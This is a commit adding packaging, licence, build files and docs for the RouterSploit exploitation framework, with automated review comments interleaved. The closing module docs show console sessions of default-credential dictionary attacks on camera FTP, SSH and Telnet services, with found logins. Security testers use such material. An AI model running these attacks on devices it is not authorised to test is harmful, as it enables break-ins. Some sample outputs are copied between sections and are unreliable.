Commit 6f2e8a7d authored by dmknght

Upload source code to nest

# Contribution Guidelines
There are many ways to contribute to RouterSploit project, and the routersploit team is grateful for all contributions. This overview summarizes the most important steps to get you started as a contributor.
* Report bugs to the routersploit issue tracker.
* Make suggestions for changes, updates, or new features to the routersploit issue tracker.
* Contribute bug fixes, example code, documentation, or tutorials to routersploit.
* Contribute new features to routersploit.
## Bug reports
When submitting bug reports, please consider providing the following information:
* Reproduction steps: step by step description to reproduce the problem.
* Expected: Describe the behavior you expect.
* Actual: Describe the behavior you see.
## Testing
It is hard to test modules in all possible scenarios. If you would like to help:
1. Check what device you have - identify vendor and version.
2. Check if routersploit contains exploits for the device you posses.
3. If exploit does not work but it should, check "show info" for more information. References should provide you with links to proof of concept exploits.
Example:
```
References:
- https://www.exploit-db.com/exploits/24975/
```
4. Try to use proof of concept exploit and check if it works properly. If it does, feel free to create new issue bug with explanation that the routersploit's module does not work properly.
## Development
* [Creating exploit module](https://github.com/reverse-shell/routersploit/wiki/Creating-Exploit)
* [Creating creds module](https://github.com/reverse-shell/routersploit/wiki/Creating-Creds)
* [Creating scanner module](https://github.com/reverse-shell/routersploit/wiki/Creating-Scanner)
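Review bot: In the Testing list, the fenced `References:` example sits unindented between steps 3 and 4, which ends the ordered list at step 3 and renders step 4 as a separate list; indent the "Example:" line and its fence under step 3. Step 2 has the typo "posses" (possess). The three Development links point at `github.com/reverse-shell/routersploit`, while the README added in this same commit clones from `threat9/routersploit`; use one canonical location throughout.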
FROM python:3.6
COPY requirements.txt /tmp/requirements.txt
RUN python -m pip install -r /tmp/requirements.txt
WORKDIR /routersploit
COPY . .
CMD ["python", "rsf.py"]
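Review bot: There is no `USER` instruction before `CMD ["python", "rsf.py"]`, so the framework runs as root inside the container; create an unprivileged user and switch to it before `CMD`. `FROM python:3.6` is a floating tag, so two builds of the same commit can produce different images; pin a specific patch release or an image digest. `COPY . .` copies the entire working tree into the image, so add a `.dockerignore` that excludes at least `.git` and local test artifacts.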
Copyright 2018, The RouterSploit Framework (RSF) by Threat9
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the name of RouterSploit Framework nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
The above licensing was taken from the BSD licensing and is applied to RouterSploit Framework as well.
Note that the RouterSploit Framework is provided as is, and is a royalty free open-source application.
Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit.
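Review bot: The last three lines after the disclaimer are informal additions that are not part of the BSD text, and "do whatever you want with it as long as you give the appropriate credit" reads as a different grant than the three numbered conditions above it. Licence scanners match on the standard text, and the Debian copyright entry in this commit already declares `BSD-3-clause`; keep the licence file to the standard wording and move the commentary to the README.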
recursive-include routersploit/resources/ssh_keys *.json *.key
recursive-include routersploit/resources/vendors *.dat
recursive-include routersploit/resources/wordlists *.txt
.PHONY: build run test lint lint-modules clean prune help
DIRECTORY=.
EXCLUDED=.git,rsf.py
RSF_IMAGE=routersploit
FLAKE8_IGNORED_RULES=E501,F405,F403
build:
docker build -t $(RSF_IMAGE) .
run:
docker run -it --rm $(RSF_IMAGE)
lint:
python3 -m flake8 --exclude=$(EXCLUDED) --ignore=$(FLAKE8_IGNORED_RULES) $(DIRECTORY)
tests: clean
python3 -m pytest -n16 tests/core/ tests/test_exploit_scenarios.py tests/test_module_info.py
python3 -m pytest -n16 tests/exploits/ tests/creds/ tests/encoders/ tests/generic/ tests/payloads/
clean:
find . -name '*.pyc' -exec rm -f {} +
find . -name '*.pyo' -exec rm -f {} +
find . -name '*~' -exec rm -f {} +
prune:
docker images -q -f dangling=true | xargs docker rmi
docker ps -q -f status=exited | xargs docker rm
help:
@echo " run"
@echo " Run Routersploit in docker container"
@echo " lint"
@echo " Check style with flake8."
@echo " test"
@echo " Run test suite"
@echo " clean"
@echo " Remove python artifacts."
@echo " prune"
@echo " Remove dangling docker images and exited containers."
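Review bot: `.PHONY` declares `test` and `lint-modules`, but the rule is named `tests:` and no `lint-modules` rule exists, so `make test` (the name the `help` output advertises) has no rule to run; rename the rule to `test` or fix both `.PHONY` and `help`, and drop `lint-modules` from `.PHONY`. `help` also omits `build`. In `prune`, `docker images -q -f dangling=true | xargs docker rmi` invokes `docker rmi` with no arguments when nothing matches and fails the target; use `xargs -r` so the command is skipped on empty input, and do the same for the `docker rm` line.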
# RouterSploit - Exploitation Framework for Embedded Devices
[![Python 3.6](https://img.shields.io/badge/Python-3.6-yellow.svg)](http://www.python.org/download/)
[![Build Status](https://travis-ci.org/threat9/routersploit.svg?branch=master)](https://travis-ci.org/threat9/routersploit)
The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.
[![asciicast](https://asciinema.org/a/180370.png)](https://asciinema.org/a/180370)
It consists of various modules that aids penetration testing operations:
* exploits - modules that take advantage of identified vulnerabilities
* creds - modules designed to test credentials against network services
* scanners - modules that check if a target is vulnerable to any exploit
* payloads - modules that are responsible for generating payloads for various architectures and injection points
* generic - modules that perform generic attacks
# Installation
## Requirements
Required:
* future
* requests
* paramiko
* pysnmp
* pycrypto
Optional:
* bluepy - bluetooth low energy
## Installation on Kali Linux
```
apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
```
Bluetooth Low Energy support:
```
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
```
## Installation on Ubuntu 18.04 & 17.10
```
sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
```
Bluetooth Low Energy support:
```
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
```
## Installation on OSX
```
git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py
```
## Running on Docker
```
git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit
```
# Update
Update RouterSploit Framework often. The project is under heavy development and new modules are shipped almost every day.
```
cd routersploit
git pull
```
# License
The RouterSploit Framework is under a BSD license.
Please see [LICENSE](LICENSE) for more details.
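Review bot: In the OSX block, `sudo python3 -m pip install -r requirements.txt` installs third-party packages system-wide as root, which runs every dependency's setup code with root privileges; document a virtualenv or `pip install --user` instead. The Requirements list names `pycrypto`, which is no longer maintained; consider `pycryptodome` as the listed dependency. In the Ubuntu Bluetooth block, `apt-get install libglib2.0-dev` lacks the `sudo` that the preceding Ubuntu block uses, so the step fails for a non-root user as written.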
routersploit (3.4.0-0kali1) kali-dev; urgency=medium
* Import new upstream release
-- Sophie Brun <sophie@freexian.com> Thu, 18 Oct 2018 09:12:34 +0200
routersploit (3.3.0-0kali1) kali-dev; urgency=medium
* Import new upstream release
-- Sophie Brun <sophie@freexian.com> Tue, 10 Jul 2018 12:12:21 +0200
routersploit (3.2.0-0kali1) kali-dev; urgency=medium
* New upstream version 3.2.0
* Use pybuild to build the package
* Add a patch to improve setup.py
* Add a symlink to keep routersploit as command
* Remove useless debian/docs (we have a debian/routersploit.docs)
-- Sophie Brun <sophie@freexian.com> Tue, 26 Jun 2018 10:49:16 +0200
routersploit (3.1.0-0kali1) kali-dev; urgency=medium
* Import new upstream release
-- Sophie Brun <sophie@freexian.com> Tue, 12 Jun 2018 14:05:05 +0200
routersploit (3.0.0-0kali1) kali-dev; urgency=medium
* Import new usptream release
-- Sophie Brun <sophie@freexian.com> Tue, 29 May 2018 11:02:00 +0200
routersploit (2.2.1-0kali1) kali-dev; urgency=medium
* Import new upstream release
-- Sophie Brun <sophie@freexian.com> Fri, 16 Jun 2017 11:47:36 +0200
routersploit (2.0.0+git20160426-0kali2) kali-dev; urgency=medium
* Update debian/watch
-- Sophie Brun <sophie@freexian.com> Wed, 27 Apr 2016 11:13:40 +0200
routersploit (2.0.0+git20160426-0kali1) kali-dev; urgency=medium
* Initial release (Closes: 0003255)
-- Sophie Brun <sophie@freexian.com> Tue, 26 Apr 2016 10:36:39 +0200
Source: routersploit
Section: misc
Priority: optional
Maintainer: Kali Developers <devel@kali.org>
Uploaders: Sophie Brun <sophie@freexian.com>
Build-Depends: debhelper (>=11), dh-python, python3-all, python3-setuptools
Standards-Version: 4.2.1
Homepage: https://github.com/reverse-shell/routersploit
Vcs-Git: git://git.kali.org/packages/routersploit.git
Vcs-Browser: http://git.kali.org/gitweb/?p=packages/routersploit.git;a=summary
Package: routersploit
Architecture: all
Depends: ${misc:Depends},
${python3:Depends}
Recommends: python3-bluepy
Description: Exploitation Framework for Embedded Devices
This package contains an open-source exploitation framework dedicated to
embedded devices. It consists of various modules that aids penetration testing
operations:
* exploits - modules that take advantage of identified vulnerabilities.
* creds - modules designed to test credentials against network services.
* scanners - modules that check if target is vulnerable to any exploit.
* payloads - modules that are responsible for generating payloads for various
architectures and injection points.
* generic - modules that perform generic attacks.
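Review bot: `Vcs-Git: git://git.kali.org/packages/routersploit.git` uses the unauthenticated, unencrypted `git://` scheme and `Vcs-Browser` uses plain `http://`; anyone following these fields fetches packaging sources without transport integrity, so switch both to `https://` URLs. `Homepage` points at `reverse-shell/routersploit` while the README in this commit directs users to `threat9/routersploit`; align them.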
Format: https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
Upstream-Name: routersploit
Source: https://github.com/reverse-shell/routersploit
Files: *
Copyright: 2016-2018, The RouterSploit Framework (RSF) by Threat9
License: BSD-3-clause
Files: routersploit/libs/lzs/lzs.py
Copyright: 2011 Filippo Valsorda - FiloSottile
License: GPL-3+
This package is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License, or
(at your option) any later version.
.
This package is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>
.
On Debian systems, the complete text of the GNU General
Public License version 3 can be found in "/usr/share/common-licenses/GPL-3"
Files: debian/*
Copyright: 2016-2018 Sophie Brun <sophie@freexian.com>
License: BSD-3-clause
License: BSD-3-clause
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
.
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS
BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
usr/bin/rsf.py usr/bin/routersploit
#!/usr/bin/make -f
%:
dh $@ --with python3 --buildsystem=pybuild
override_dh_auto_test:
# don't run the tests: a requirement is missing: threat9-test-bed
#python3 -m pytest
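Review bot: `override_dh_auto_test` contains only comments, so the package build runs no tests at all and a broken import or syntax error in the shipped modules would not be caught at build time. Either package `threat9-test-bed` and add it to `Build-Depends`, or run the subset of tests that does not import it, and leave a pointer to a tracking bug in the comment so the override is not permanent.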
version=4
opts=filenamemangle=s/.*\/v(\d[\d.]*)\.tar\.gz/routersploit-$1\.tar\.gz/ \
https://github.com/reverse-shell/routersploit/tags .*/v?(\d[\d.]*)\.tar\.gz debian uupdate
## Description
Module performs dictionary attack with default credentials against Acti Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/acti/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/acti/ftp_default_creds
rsf (Acti Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Acti Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Acti Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/acti/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/acti/ssh_default_creds
rsf (Acti Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Acti Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Acti Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/acti/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/acti/telnet_default_creds
rsf (Acti Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Acti Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against American Dynamics Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/american_dynamics/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/american_dynamics/ftp_default_creds
rsf (American Dynamics Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (American Dynamics Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against American Dynamics Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/american_dynamics/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/american_dynamics/ssh_default_creds
rsf (American Dynamics Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (American Dynamics Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```